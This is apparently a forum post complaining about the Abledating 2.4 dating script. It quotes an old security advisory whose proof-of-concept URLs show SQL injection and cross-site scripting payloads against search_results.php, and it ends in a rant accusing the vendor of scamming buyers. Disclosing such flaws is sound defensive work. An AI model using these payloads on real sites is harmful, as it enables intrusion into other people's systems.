Hi everyone.
I just found news that Abledating has a serious security issue in its software.
abledating 2.4 >> Sql injection and cross site scripting on search_results.php
SecurityAlert : 5377
CVE : CVE-2008-6439
CWE : CWE-79
SecurityRisk : Low 
(About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Given : Yes
Credit : Ali Jasbi
Published : 10.03.2009
| Affected Software : |
abledating:abledating:2.4 |
“Advisory Text :
By : Ali Jasbi ( hackerz.ir security & hacking team)
vendor : abk-soft.com
product name : abledating 2.4
Exploits :
1- Sql injection :
bug :
http://abledating//search_results.php?p_age_from=18&p_age_to=18&keyword=
[sql
injection]&status=online&save_search=on&search_name=My%20search&photo=on
&p_orientation%255B%255D=2&order=rating&sort=desc&p_relation%255B%255D=4
&search
test :
http://abledating/search_results.php?p_age_from=18&p_age_to=18&keyword=%
00′&status=online&save_search=on&search_name=My%20search&photo=on&p_orie
ntation%255B%255D=2&order=rating&sort=desc&p_relation%255B%255D=4&search
2-Cross site scripting :
bug :
http://abledating/search_results.php?p_orientation%5B%5D=2&p_age_from=18
&p_age_to=18&p_relation%5B%5D=on&keyword=>’><ScRiPt%20%0a%0d>alert(42119
.7535489005)%3B</ScRiPt>&status=online&save_search=on&search_name=My%20s
earch&photo=on“
Well you pay for abledating crappy software thenĀ abledating scams you, steals your money, rips off you, gives no support as it is promised and in the end abledating software is insecure and has secuirty wholes. Great!
If I could do a search before the purchase of abledating software I would be lucky.
Feel free to share your opinion here.
Regards, B.
